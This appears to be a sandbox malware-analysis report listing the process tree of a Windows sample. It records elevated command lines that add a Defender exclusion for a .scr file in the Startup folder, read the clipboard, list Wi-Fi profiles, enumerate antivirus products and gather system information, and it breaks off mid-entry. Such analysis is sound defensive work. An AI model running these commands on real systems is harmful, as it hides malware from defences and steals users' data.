                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:02:37:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                            Imagebase:0x7ff72f7f0000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                            Start time:02:37:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                            Start time:02:37:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                            Start time:02:37:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                            Start time:02:37:20
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                            Start time:02:37:20
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                            Start time:02:37:21
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                            Start time:02:37:22
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                            Start time:02:37:22
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                            Start time:02:37:22
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                            Start time:02:37:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                            Start time:02:37:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                            Start time:02:37:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                            Start time:02:37:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                            Start time:02:37:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff641f10000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                            Start time:02:37:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff641f10000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff641f10000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                            Start time:02:37:26
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                            Start time:02:37:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                            Start time:02:37:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                            Start time:02:37:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                            Start time:02:37:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff736450000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                            Start time:02:37:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                                                                                            Imagebase:0x7ff6dd050000
                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                            Start time:02:37:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                            Start time:02:37:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                            Imagebase:0x7ff7a7ab0000
                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                            Start time:02:37:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                            Start time:02:37:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
